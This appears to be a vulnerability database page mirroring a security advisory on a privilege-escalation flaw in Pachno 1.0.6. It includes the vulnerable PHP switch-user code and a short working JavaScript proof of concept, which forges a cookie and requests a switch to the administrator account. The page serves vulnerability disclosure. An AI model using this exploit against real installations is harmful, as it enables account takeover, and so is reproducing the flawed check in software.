📄 Pachno 1.0.6 Privilege Escalation_PACKETSTORM:218859

Description

The authorization check in the runSwitchUser action in Pachno version 1.0.6 evaluates the expression !canSaveConfiguration && !hasCookie'originalusername' and only forbids the request when both subexpressions are true. The presence of the...

Visit Original Source

Basic Information

ID PACKETSTORM:218859

Published Apr 13, 2026 at 00:00

Affected Product

Affected Versions Pachno 1.0.6 (runSwitchUser()) Remote Vertical Privilege Escalation

Vendor: Daniel André Eikeland
Product web page: https://github.com/pachno/pachno
Affected version: 1.0.6

Summary: Pachno is an open-source collaboration platform (formerly known as The Bug
Genie) designed for team project management, issue tracking, and documentation. It
offers a module-based, customizable environment for software development and team
workflows, distributed under the Mozilla Public License.

Desc: The authorization check in the runSwitchUser() action evaluates the expression
!canSaveConfiguration() && !hasCookie('original_username') and only forbids the request
when both subexpressions are true. The presence of the original_username cookie is
sufficient to satisfy the second condition, and that cookie is fully client-controlled.
An authenticated low-privilege user who sets original_username to any value and then
issues a request to switch to user ID 1 receives a fresh session token (token authentication)
or password hash cookie (password authentication) belonging to the target user. This
can be exploited to elevate privileges to administrator and impersonate arbitrary user
accounts.

=====================================================================================
/core/modules/auth/controllers/Authentication.php:
--------------------------------------------------
/**
* Switch user action
*
* @Route(name="switch_to_user", url="/userswitch/switch/:user_id/:csrf_token")
* @CsrfProtected
*
* @param framework\Request $request
*/
public function runSwitchUser(framework\Request $request)
{
if (!$this->getUser()->canSaveConfiguration() && !$request->hasCookie('original_username'))
return $this->forward403();

$response = $this->getResponse();
$authentication_backend = framework\Settings::getAuthenticationBackend();
if ($request['user_id']) {
$user = new entities\User($request['user_id']);
if ($authentication_backend->getAuthenticationMethod() == framework\AuthenticationBackend::AUTHENTICATION_TYPE_TOKEN) {
$response->setCookie('original_username', $request->getCookie('username'));
$response->setCookie('original_session_token', $request->getCookie('session_token'));
framework\Context::getResponse()->setCookie('username', $user->getUsername());
framework\Context::getResponse()->setCookie('session_token', $user->createUserSession()->getToken());
} else {
$response->setCookie('original_username', $request->getCookie('username'));
$response->setCookie('original_password', $request->getCookie('password'));
framework\Context::getResponse()->setCookie('password', $user->getHashPassword());
framework\Context::getResponse()->setCookie('username', $user->getUsername());
}
} else {
if ($authentication_backend->getAuthenticationMethod() == framework\AuthenticationBackend::AUTHENTICATION_TYPE_TOKEN) {
$response->setCookie('username', $request->getCookie('original_username'));
$response->setCookie('session_token', $request->getCookie('original_session_token'));
framework\Context::getResponse()->deleteCookie('original_session_token');
framework\Context::getResponse()->deleteCookie('original_username');
} else {
$response->setCookie('username', $request->getCookie('original_username'));
$response->setCookie('password', $request->getCookie('original_password'));
framework\Context::getResponse()->deleteCookie('original_password');
framework\Context::getResponse()->deleteCookie('original_username');
}
}
$this->forward($this->getRouting()->generate('home'));
}
=====================================================================================

Tested on: GNU/Linux
Apache2
PHP/7.4
MySQL/5.7 (MariaDB)

Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience

Advisory ID: ZSL-2026-5985
Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5985

06.04.2026

--

document.cookie = "original_username=liquidworm; path=/";

const csrf = document.querySelector('input[name="csrf_token"]')?.value
|| document.querySelector('meta[name="csrf-token"]')?.content;

fetch('/switch_user', {
method: 'POST',
credentials: 'include',
headers: { 'Content-Type': 'application/x-www-form-urlencoded',
'User-Agent' : 'AuthorizationBypassium/1.12.04' },
body: `user_id=1&csrf_token=${encodeURIComponent(csrf)}`
}).then(() => {
window.location.href = '/configure';
});
// If you 'see' /configure, you are admin.

{
    "lastseen": "2026-04-13T17:44:38",
    "description": "The authorization check in the runSwitchUser action in Pachno version 1.0.6 evaluates the expression !canSaveConfiguration && !hasCookie'originalusername' and only forbids the request when both subexpressions are true. The presence of the...",
    "published": "2026-04-13T00:00:00",
    "modified": "2026-04-13T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Pachno 1.0.6 Privilege Escalation",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:218859",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [],
    "sourceData": "Pachno 1.0.6 (runSwitchUser()) Remote Vertical Privilege Escalation\n    \n    \n    Vendor: Daniel Andr\u00e9 Eikeland\n    Product web page: https://github.com/pachno/pachno\n    Affected version: 1.0.6\n    \n    Summary: Pachno is an open-source collaboration platform (formerly known as The Bug\n    Genie) designed for team project management, issue tracking, and documentation. It\n    offers a module-based, customizable environment for software development and team\n    workflows, distributed under the Mozilla Public License.\n    \n    Desc: The authorization check in the runSwitchUser() action evaluates the expression\n    !canSaveConfiguration() && !hasCookie('original_username') and only forbids the request\n    when both subexpressions are true. The presence of the original_username cookie is\n    sufficient to satisfy the second condition, and that cookie is fully client-controlled.\n    An authenticated low-privilege user who sets original_username to any value and then\n    issues a request to switch to user ID 1 receives a fresh session token (token authentication)\n    or password hash cookie (password authentication) belonging to the target user. This\n    can be exploited to elevate privileges to administrator and impersonate arbitrary user\n    accounts.\n    \n    =====================================================================================\n    /core/modules/auth/controllers/Authentication.php:\n    --------------------------------------------------\n            /**\n             * Switch user action\n             *\n             * @Route(name=\"switch_to_user\", url=\"/userswitch/switch/:user_id/:csrf_token\")\n             * @CsrfProtected\n             *\n             * @param framework\\Request $request\n             */\n            public function runSwitchUser(framework\\Request $request)\n            {\n                if (!$this->getUser()->canSaveConfiguration() && !$request->hasCookie('original_username'))\n                    return $this->forward403();\n    \n                $response = $this->getResponse();\n                $authentication_backend = framework\\Settings::getAuthenticationBackend();\n                if ($request['user_id']) {\n                    $user = new entities\\User($request['user_id']);\n                    if ($authentication_backend->getAuthenticationMethod() == framework\\AuthenticationBackend::AUTHENTICATION_TYPE_TOKEN) {\n                        $response->setCookie('original_username', $request->getCookie('username'));\n                        $response->setCookie('original_session_token', $request->getCookie('session_token'));\n                        framework\\Context::getResponse()->setCookie('username', $user->getUsername());\n                        framework\\Context::getResponse()->setCookie('session_token', $user->createUserSession()->getToken());\n                    } else {\n                        $response->setCookie('original_username', $request->getCookie('username'));\n                        $response->setCookie('original_password', $request->getCookie('password'));\n                        framework\\Context::getResponse()->setCookie('password', $user->getHashPassword());\n                        framework\\Context::getResponse()->setCookie('username', $user->getUsername());\n                    }\n                } else {\n                    if ($authentication_backend->getAuthenticationMethod() == framework\\AuthenticationBackend::AUTHENTICATION_TYPE_TOKEN) {\n                        $response->setCookie('username', $request->getCookie('original_username'));\n                        $response->setCookie('session_token', $request->getCookie('original_session_token'));\n                        framework\\Context::getResponse()->deleteCookie('original_session_token');\n                        framework\\Context::getResponse()->deleteCookie('original_username');\n                    } else {\n                        $response->setCookie('username', $request->getCookie('original_username'));\n                        $response->setCookie('password', $request->getCookie('original_password'));\n                        framework\\Context::getResponse()->deleteCookie('original_password');\n                        framework\\Context::getResponse()->deleteCookie('original_username');\n                    }\n                }\n                $this->forward($this->getRouting()->generate('home'));\n            }\n    =====================================================================================\n    \n    Tested on: GNU/Linux\n               Apache2\n               PHP/7.4\n               MySQL/5.7 (MariaDB)\n    \n    \n    Vulnerability discovered by Gjoko 'LiquidWorm' Krstic\n                                @zeroscience\n    \n    \n    Advisory ID: ZSL-2026-5985\n    Advisory URL: https://www.zeroscience.mk/#/advisories/ZSL-2026-5985\n    \n    \n    06.04.2026\n    \n    --\n    \n    \n    document.cookie = \"original_username=liquidworm; path=/\";\n    \n    const csrf = document.querySelector('input[name=\"csrf_token\"]')?.value\n              || document.querySelector('meta[name=\"csrf-token\"]')?.content;\n    \n    fetch('/switch_user', {\n        method: 'POST',\n        credentials: 'include',\n        headers: { 'Content-Type': 'application/x-www-form-urlencoded',\n                   'User-Agent'  : 'AuthorizationBypassium/1.12.04' },\n        body: `user_id=1&csrf_token=${encodeURIComponent(csrf)}`\n    }).then(() => {\n        window.location.href = '/configure';\n    });\n    // If you 'see' /configure, you are admin.",
    "sourceHref": "https://packetstorm.news/download/218859",
    "cvss": {
        "score": 0,
        "severity": "NONE",
        "vector": "NONE",
        "version": "NONE"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/218859/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply